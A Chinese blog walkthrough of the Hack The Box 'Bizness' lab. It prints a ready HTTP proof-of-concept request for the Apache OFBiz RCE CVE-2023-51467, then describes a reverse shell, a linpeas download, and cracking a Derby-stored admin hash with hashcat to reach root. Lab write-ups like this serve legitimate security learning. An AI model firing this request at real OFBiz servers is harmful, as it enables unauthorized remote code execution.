首页 > 其他分享 >HTB打靶——Bizness

HTB打靶——Bizness

时间:2024-03-21 17:55:19浏览次数:25  
标签:... zh HTB Bizness 打靶 提权 flag 靶机 htb

#简述

关于Hack the Box的Bizness机器渗透过程。
靶机:10.10.11.252
攻击机(Kali):10.10.14.39

#过程

1、连接OpenVPN后,使用nmap对靶机进行端口扫描:nmap -A 10.10.11.252
屏幕截图 2024-03-03 212324.jpg
2、扫描得到的结果发现该靶机开启了** 22、80、443**端口,其中根据信息显示,该靶机运行这一个nginx的web服务器,同时并没有重定向到一个 https://bizness.htb/ 这个URL,于是在hosts文件中添加靶机IP指向域名 bizness.htb

(一开始思路放在22端口上,认为ssh弱口令爆破,无果...)
屏幕截图 2024-03-04 202802.jpg3、成功访问,但是点击测试完页面所有的功能点都无新发现。
屏幕截图 2024-03-04 203543.jpg
4、用dirsearch进行目录扫描:python dirsearch -u https://bizness.htb/
发现路径 /control 响应码为200。
屏幕截图 2024-03-03 212024.jpg
5、访问后显示一个报错页面
屏幕截图 2024-03-03 211729.jpg
6、再访问 /control/login,有个登录框,弱口令无果,翻看页面源码也没什么收获
屏幕截图 2024-03-03 211710.jpg
7、然后搜索了下OFBIZ,发现这个系统历史版本存在过漏洞,接着思路转向到使用Nday去打,右下角有Apache OFBiz版本号 18.12
屏幕截图 2024-03-04 204643.jpg
8、继续搜索,许多漏洞库都记录这个版本的OFBiz存在RCE漏洞,
漏洞编号为 CVE-2023-51467,(还是挺新的
屏幕截图 2024-03-03 213008.jpg
屏幕截图 2024-03-03 213020.jpg
9、在网上找到该漏洞对应的POC:

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: bizness.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

验证一下是否存在,成功复现:
屏幕截图 2024-03-03 211348.jpg
屏幕截图 2024-03-03 211559.jpg

10、或者在Github上找对应的EXP,也能成功复现,可进一步实行渗透
屏幕截图 2024-03-03 213719.jpg
屏幕截图 2024-03-03 213744.jpg
11、踩雷了一个地方,使用另一个项目的exp反弹shell一直失败,用图形化的那个EXP倒是能成功(nc和bash两个都试过)
屏幕截图 2024-03-03 215426.jpg
12、kali监听5555端口,靶机成功反弹shell
屏幕截图 2024-03-03 215650.jpg
交互式shell,能成功执行命令
屏幕截图 2024-03-03 215724.jpg
13、在家目录可以找到用户flag
屏幕截图 2024-03-03 215926.jpg
到这里开始就个人思路到瓶颈了,(大概知道要提权才能拿到root flag,但还没有学过Linux提权,这里开始就不得不去看一些wp或技术文档学习然后再复现了...

14、关于本地提权用到一款很强大的工具 PEASS-ng,其中 LinPEAS 是Linux的提权脚本。

在攻击机用python开启http服务,再用靶机执行wget命令下载 linpeas.sh 到本地
屏幕截图 2024-03-04 162313.jpg
15、执行脚本:bash linpeas.sh
屏幕截图 2024-03-04 163024.jpg
这个龟龟还挺可爱(: bushi
16、执行脚本后对靶机自身一顿扫...
屏幕截图 2024-03-04 163042.jpg
17、扫描出来的信息量巨大...通过看别人的文章,发现这是一堆derby下的数据文件 (derby是一种小型的数据库)
屏幕截图 2024-03-04 164030.jpg
18、切换至 ../seg0 目录,执行 string -f seg0/*.dat | grep -i 'password',匹配到一个admin用户的密码
屏幕截图 2024-03-04 164535.jpg
19、得到一串hash字符串:$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I
根据Chat-GPT的回答:
屏幕截图 2024-03-04 165457.jpg
20、使用CyberChef 对后半段字符串进行解密成16进制的字符串
屏幕截图 2024-03-04 170118.jpg
21、这段hash还是经过加盐(salt)的,所以用kali自带的 hashcat 对其进行爆破
hashcat -m 120 -a 0 123.txt /usr/share/wordlists/rockyou.txt
屏幕截图 2024-03-04 171817.jpg
成功爆破出这段hash为 monkeybizness
22、su提权到root,使用上述密码成功提权
屏幕截图 2024-03-04 172251.jpg
23、找到root的flag值,至此两个flag都被找到,靶机也成功得到最高权限。
屏幕截图 2024-03-04 172318.jpg
24、艰难……
屏幕截图 2024-03-04 172424.jpg

标签:...,zh,HTB,Bizness,打靶,提权,flag,靶机,htb
From: https://www.cnblogs.com/gsh23/p/18087933

相关文章

  • 【小猪学渗透】打靶第2天:DVWA入门:暴力破解、命令注入、文件上传
    暴力破解low题目界面如上先抓个包试试,发送到intruder可以看到用GET数据包传输,username和password都是直接写在了url上在password后面的数字上加上$123$这样好进行替换。报错,没有加载字典,在知乎上找到了一篇文章讲字典的找到了一个老的字典库开始攻击,发现......
  • 【小猪学渗透】打靶第1天:DVWA入门:SQL注入、SQL盲注
    前言小猪同学正式开始了渗透测试的学习,今天是入门打靶DWVA--真是开心的一天呢--参考文章这是一篇来自于csdn的攻略文开始-环境搭建小猪同学已经事先搭建好了靶场。sql手工注入low输入1and1=1判断注入点输入1’and1=1报错发现注入点,受到单引号闭合的影响......
  • 【HTB】Sherlocks Recollection 蓝队 easy
    工具:volatility2.6(2比3完善) https://www.volatilityfoundation.org/25kali下载volatility2.6#下载pip2sudowgethttps://bootstrap.pypa.io/pip/2.7/get-pip.pysudopython2get-pip.py#pycrypto、distorm3所需依赖sudopython2-mpipinstall-Usetuptoolswh......
  • 【HTB】Sherlocks Ore 蓝队 medium
    task1问题:哪个CVE导致了EC2的最初泄露?#文件放在~/htb/Ore目录cdusr/share/grafanals-lacatVERSION #8.2.0搜索grafana8.2.0exploit可得CVE-2021-43798答案:CVE-2021-43798task2问题:请详细说明针对我们组织的威胁行为者(TA)使用的所有恶意IP地址......
  • HTB_pwn_pet_companion_exp
    frompwnimport*context.log_level='debug'elf=ELF('./pet_companion')io=remote('94.237.54.152',51111)padding=72pop_rdi=0x0000000000400743#:poprdi;retpop_rsi=0x0000000000400741#:poprsi;retpayload=b......
  • HTB-Fawn(FTP)
    HTB-Fawn(FTP)1.TASK1问题:3个字母的首字母缩写词FTP代表什么?FTP是文件传输协议的简写。FTP文件传输协议(FileTransferProtocol)是用于在网络上进行文件传输的一套标准协议,它工作在OSI模型的第七层,TCP模型的第四层—————应用层,FTP使用TCP传输而不是UDP传输,它有两......
  • 红日靶场01多角度打靶笔记
    红日靶场01这个笔记主要是利用这个靶场环境,对内网渗透的思路进行整合一下,因此过程中会涉及多个攻击方式和思路。环境搭建windows7是靶机01Windowsserver2008R2是靶机02Windowsserver2003是靶机03Windows10是攻击01kali是攻击02(cs服务端和msf都在上面)这个靶......
  • HTB/鳄鱼
    继续下一关!还是免费的一关这一关包含了1.ftp匿名登录,拿到用户名和密码文件2.使用gobuster爆破字目录/文件这里访问login.php用之前拿到的用户名和密码登录就可以拿到flag了......
  • HTB/续集
    继续!下一关到目前的HTB还是比较基础主要还是因为免费......
  • HTB/预约
    这其实不是第五关!因为真的第五关是要钱的!换一个免费的玩这一关就是最简单的sql注入了......